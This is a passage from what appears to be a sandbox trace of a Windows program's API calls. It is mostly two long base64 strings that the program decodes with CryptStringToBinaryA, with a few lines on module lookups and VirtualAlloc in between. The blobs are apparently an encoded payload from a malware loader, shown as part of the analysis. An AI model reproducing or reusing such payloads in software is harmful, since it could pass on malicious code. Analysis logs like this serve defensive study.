0H/vdBC9SnRVcLgQG1Obb9pr9LR08PN+AZzNEpEPEqUaduBPdK1gAEnjPnUNAQBG+c4XE9BvrjxZy/2MsXa16RWJEAexFmv+/637OumYhZvsOtL0vsSuiQ9hiwBJmLgQ+33DJvuI7xtEZGW87gF1KSY8o7fDDn6xdBAPq3RBehGMkYWbTd+C887MaHK4FMsOxvQ6FpwGAFKtqmPlkRJRN2MPAXYwfwUXZ21/Fkhke4vznjt2Jhlkm+y3G/s/T4CO/+xriiUsPFV5+X5M+/0Y57ZbZeiT+z900POIyhNLECs2eg8B8K3wPJ2MDh5sT2QPlmN5+s1r+IGbBWSJ8P5y6POtAEs6ZBPuHjCK8iZ2fRBnelyts5rw/v8uE/znHC+J7LcYGP/wKWHv6JgGc+24H3rs/614FemXAeH+t5t7u+8sHQIXZ/oYSctjDwH/7XKA4BHwlzHyky1rZ1UEAmMlGWMTSBA/d3olAwIXWWyPZ3a+D/n/rXg16O2DKe2EbRv3zX9F/eiIhagsPAZoBgBSehoXZ4qb72+IDs0/KSnyfVgEehOwm/C+chw3BhdnhmtlAi8IAQBF2t3omNTKMau/GNnerfuksXDV2ey3EnVqB1IEwBdneuSYsKbw/v8tjvXbWAweeE9kD3dinQUCF6teHhM+JsQAAFL0aCvbDAbASWQPewmicxDrmIUYSSdhDwH/x/mjLx0RYRNIm/Du/yROcRJneqAyuB7w/P+tyDRjHIgLFkhky3rynQUCF5cAce23m3M/+y4C9Z18Dh5YT2QPzS0uO/9jaAZ78927qdU3JH5ZEGd6qCx2dfW+dhhLBRdnDBZ8T2QPFn/s+/1rPRljE0ibuPFCYnJ4QGB6ZBtnEnVyB1IEievZbpnffvHQptRsdqvqoQA/FEhkeWtTVQQC5w9FGBbEE3VFB1IE8n9ZBmGfwpN0PoupS/wDmrdbaH6UdRH/rft5KJcAfOy3m5qMppYqj+ATVBJhG2MPAXRncnBIYHpkb01k/3pprfv9Y2oIHtxJZA91ah0DAhezdxboBxJ1SgdSBMYi6uigH8Sfe8YUr8gCZd56oC/EkHt7S1UEAmPYeXDuhFvTe3NVBALLJS1jE0gQfW4HUgQuABMIPxRIZCMZdCBbBRdnjlxlMxbAAABSsnZtLH1kE/kYGPp2IFsFF2cMHlhPZA99BlKP9WMFqWUTSHB/dWoBAwIXEzArFEhkdQiLoXAzZSW1ZRNIqDANVC1GRhBneptXe5rw/oumdr/pEQC3EkhkG812ONcDF2dusN93IDz//62rdG0Uf2QTPh7cAABSdnh4YnpkvDoewAAAUqitANlTZBM0X+B9WjkBAheYtlKGs8Oxd3o9AQIXEQgXFkhkeXOjUQQCuBUACxZIZKBzes0HAhfL1XPmYWQPfTu9EqHsmIUQaQNjDwHMf7t2EBtlhIaXwts2dihLBRdntlstWJ6wd0IZAwIXEQgLFEhkGF7Arft2ZAWpZRNI03NbY1UEAuiXOFJlMjMIAQBaK3RtFH1kE8OYsRX9njKXyMCuWmGjoMl7T1UEAmENJWMTSJRnPnxXiHVtI31kE7gMMX0F3o71bFjxn1y2cPLMPyky8m10hZvsM1v/exut+/2C6tygPcWTey92IFsFF2cOWWUyNwgBAC4BAuccFpvstxACc3KdBQIXExAvFEhk2wxyoUp0ZTx9ZBOMWYKZxF6I+WOhbpnfSBa2AcRuiPhj2Xlw7oRb00NXVQQCyx0JYxNIEH1OB1IELg8TCAsUSGQjFnQgXwUXZ45jZzI3CAEALhL5YRUhYxNIEkx7z1MEAqDWDB5AT2QPfQdSj/VjBallE0hwZXVqDQMCFxM4LxRIZJr8oSgEieQTSqgsOibAAABSCFZoJT5jE0ibSzL+rfuJ4xXHmmUytw4BAEbIdH20e2QTXLDDPkRh+v3oyAweYE1kD3d6gQUCFxUACxZIZKBzep0FAhfL1XOxY2QPfTu9eFh8Ynpk7IRbsHdKPQECFxEAFxZIZHl7o1EEAoKcbIISSGRxAP1RBALnHJya7LcYVW4FUgT9gprcXGkjYQ8B/63r/WEVCWETSKAp8Xpa+/3oq1cQaKILCgEAln/o2GZ6ZOMyevD+/y45+Wtije4IND5sBgBS+/JVX/GeYeeaG/zMf5HdsLNHEB2MWn17x1MEAmEdKWMTSBAI8W0oQAUXZ75on70Q53dqHQMCF3OCGEkHYw8B/yC9AtNb9p5n4Gcb/Mx/cHhYYHpkb1ifMR79bBHj20gOHkBPZA+wdr14FewRADcUSGRzAADZ83Z1tHtkE1w2wz7HKEAFF2eKDiy0WttzS1UEAmNhDB7ASWQPPxCodnh4YnpkZ0ASfVYHUgQ8DprT8ezncx3CAFJwcEBgemTfd9tzH+B+G3RsrRVhE0gWt/8W7fr96BMBBsBJZA99WjEDAheYiiYsw559tv5G+c4h8qXDx3YYCP/wPzt+E+sNHldPZA/xaGx4BpvtjR8sw59A/xSvyT1sUYoed7eb8Ho/on5u6JiF8Z7uoCmN/SYwfhFn8fJhCqsOAQAmCnDUFwwmQE9kD8UM3vF2/xEQKxRIZBv5fAhLBRdnhRaqSKAzjfomrAEDmrZJZzIrCAEALhT561hEcfOES3t7U1UEAqYRlRgEsxJ1UgdSBH4WZ/GTZyq3DgEARlV2XSx9ZBM3JksGAFL7ieMVxJplMrcOAQBGyHRltHtkE1ywc1tzVwQC6BUACxZIZHNb01MEAujyhcthMqsOAQDFN/zomNVz62VkD307vcgCZR0VYRNI3NsAdHI6Fu0TdloKtc2a/q9FX8YXZ7Zbb1CEsHUwfht0bK0VYRNIFrP/dih3BxdnPlftt5t5e6NRBAIpeIfLYTILCgEA/XZ4iGR6ZL/nc1kvAFJ4OfQTAA8USGTDLJWnonRlFH1kEzJb/3acqfv9H2kMHnxPZA91NSR2YRBneh4suB+B/f+teAXO7obxyu+URvJ6cyj82Jczr2loSPHOdFRyeExgemQtUJmnc/uccnhkYnpkYTILCgEAx/utAGC/ZBM8XTEe/f1weExgemTjAJ9", cchString=0x4a704, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19f43c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19f43c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0122.838] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f38c | out: DllHandle=0x19f38c*=0x74030000) returned 0x0 [0122.838] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0122.838] VirtualAlloc (lpAddress=0x0, dwSize=0x37d45, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0122.840] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f380 | out: DllHandle=0x19f380*=0x74030000) returned 0x0 [0122.840] GetModuleHandleA (lpModuleName="Crypt32.dll") returned 0x74440000 [0122.841] CryptStringToBinaryA (in: pszString="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